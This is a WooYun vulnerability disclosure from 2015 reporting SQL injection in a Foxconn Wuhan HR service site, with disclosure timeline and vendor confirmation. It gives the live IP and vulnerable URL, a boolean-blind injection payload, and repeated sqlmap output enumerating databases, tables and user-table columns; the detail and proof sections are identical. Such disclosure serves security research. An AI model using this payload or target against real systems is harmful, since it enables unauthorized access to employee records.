漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2015-10-14:	细节已通知厂商并且等待厂商处理中
									2015-10-14:	厂商已经确认,细节仅向厂商公开
									2015-10-24:	细节向核心白帽子及相关领域专家公开
									2015-11-03:	细节向普通白帽子公开
									2015-11-13:	细节向实习白帽子公开
									2015-11-28:	细节向公众公开
								
简要描述:
富士康(武汉)科技工业园座落于武汉东湖高新技术开发区,现有员工3万余人,占地5000余亩,厂房40余栋,主要产品涉及信息系统整合与服务产品、消费性电子产品,具备个人计算机、模具开发、成型、冲压、表面处理、组装、检测等生产能力。
武汉富士康在线服务中心系统存在SQL注射漏洞,泄漏大量信息,包括HR信息系统,泄漏2个数据库63个表等大量信息。。。
详细说明:
一次偶然的计划,来到富士康的网站:
http://116.6.67.208/hr/list.html?i_type=30
试试看有没有Sql注入:“http://116.6.67.208/hr/list.html?i_type=30’”
果然存在:
随即开启Sqlmap开跑:
漏洞地址:http://116.6.67.208/hr/list.html?i_type=30%27
http://116.6.67.208/hr/list.html?i_type=30%27
sqlmap identified the following injection points with a total of 409 HTTP(s) requests:
---
Parameter: i_type (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: i_type=-6916' OR 8068=8068#
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.3.7
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: i_type (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: i_type=-6916' OR 8068=8068#
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.3.7
back-end DBMS: MySQL 5
available databases [2]:
[*] information_schema
[*] wh
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: i_type (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: i_type=-6916' OR 8068=8068#
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.3.7
back-end DBMS: MySQL 5
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: wh
[26 tables]
+---------------------------------------+
| b_files_t                             |
| b_index_t                             |
| b_route_t                             |
| b_routeindex_t                        |
| b_user_t                              |
| emp_add_t                             |
| emp_consult_t                         |
| emp_consult_test                      |
| face_path_t                           |
| hr_3h_t                               |
| hr_man_t                              |
| hr_status_t                           |
| hr_vote_t                             |
| m_zk_t                                |
| quick_consult_t                       |
| quick_msg_t                           |
| r_emp_t                               |
| r_info_t                              |
| r_job_t                               |
| r_keyparts_t                          |
| web_num                               |
| wh_hr01_t                             |
| wh_hr02_t                             |
| wh_hr03_t                             |
| wh_hr04_t                             |
| wh_hr05_t                             |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: i_type (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: i_type=-6916' OR 8068=8068#
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.3.7
back-end DBMS: MySQL 5
Database: wh
Table: b_user_t
[4 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| i_tag  | int(11)      |
| s_mail | varchar(100) |
| s_name | varchar(30)  |
| s_no   | varchar(20)  |
+--------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: i_type (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: i_type=-6916' OR 8068=8068#
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.3.7
back-end DBMS: MySQL 5
Database: wh
Table: b_user_t
[4 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| i_tag  | int(11)      |
| s_mail | varchar(100) |
| s_name | varchar(30)  |
| s_no   | varchar(20)  |
+--------+--------------+
Database: wh
Table: wh_hr01_t
[11 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| i_id    | int(11)      |
| i_tag   | int(11)      |
| s_A     | varchar(100) |
| s_B     | varchar(100) |
| s_C     | varchar(100) |
| s_D     | varchar(100) |
| s_E     | varchar(100) |
| s_F     | varchar(100) |
| s_G     | varchar(100) |
| s_right | varchar(10)  |
| s_title | varchar(100) |
+---------+--------------+
 
漏洞证明:
一次偶然的计划,来到富士康的网站:
http://116.6.67.208/hr/list.html?i_type=30
试试看有没有Sql注入:“http://116.6.67.208/hr/list.html?i_type=30’”
果然存在:
随即开启Sqlmap开跑:
漏洞地址:http://116.6.67.208/hr/list.html?i_type=30%27
http://116.6.67.208/hr/list.html?i_type=30%27
sqlmap identified the following injection points with a total of 409 HTTP(s) requests:
---
Parameter: i_type (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: i_type=-6916' OR 8068=8068#
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.3.7
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: i_type (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: i_type=-6916' OR 8068=8068#
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.3.7
back-end DBMS: MySQL 5
available databases [2]:
[*] information_schema
[*] wh
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: i_type (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: i_type=-6916' OR 8068=8068#
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.3.7
back-end DBMS: MySQL 5
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: wh
[26 tables]
+---------------------------------------+
| b_files_t                             |
| b_index_t                             |
| b_route_t                             |
| b_routeindex_t                        |
| b_user_t                              |
| emp_add_t                             |
| emp_consult_t                         |
| emp_consult_test                      |
| face_path_t                           |
| hr_3h_t                               |
| hr_man_t                              |
| hr_status_t                           |
| hr_vote_t                             |
| m_zk_t                                |
| quick_consult_t                       |
| quick_msg_t                           |
| r_emp_t                               |
| r_info_t                              |
| r_job_t                               |
| r_keyparts_t                          |
| web_num                               |
| wh_hr01_t                             |
| wh_hr02_t                             |
| wh_hr03_t                             |
| wh_hr04_t                             |
| wh_hr05_t                             |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: i_type (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: i_type=-6916' OR 8068=8068#
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.3.7
back-end DBMS: MySQL 5
Database: wh
Table: b_user_t
[4 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| i_tag  | int(11)      |
| s_mail | varchar(100) |
| s_name | varchar(30)  |
| s_no   | varchar(20)  |
+--------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: i_type (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: i_type=-6916' OR 8068=8068#
---
web server operating system: Windows
web application technology: Apache 2.2.19, PHP 5.3.7
back-end DBMS: MySQL 5
Database: wh
Table: b_user_t
[4 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| i_tag  | int(11)      |
| s_mail | varchar(100) |
| s_name | varchar(30)  |
| s_no   | varchar(20)  |
+--------+--------------+
Database: wh
Table: wh_hr01_t
[11 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| i_id    | int(11)      |
| i_tag   | int(11)      |
| s_A     | varchar(100) |
| s_B     | varchar(100) |
| s_C     | varchar(100) |
| s_D     | varchar(100) |
| s_E     | varchar(100) |
| s_F     | varchar(100) |
| s_G     | varchar(100) |
| s_right | varchar(10)  |
| s_title | varchar(100) |
+---------+--------------+
 
修复方案:
过滤
版权声明:转载请注明来源 辣子抖焦巴@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-10-14 15:32
厂商回复:
感谢提交相关漏洞,已交由相关单位处理
最新状态:
暂无

 
                 
                        




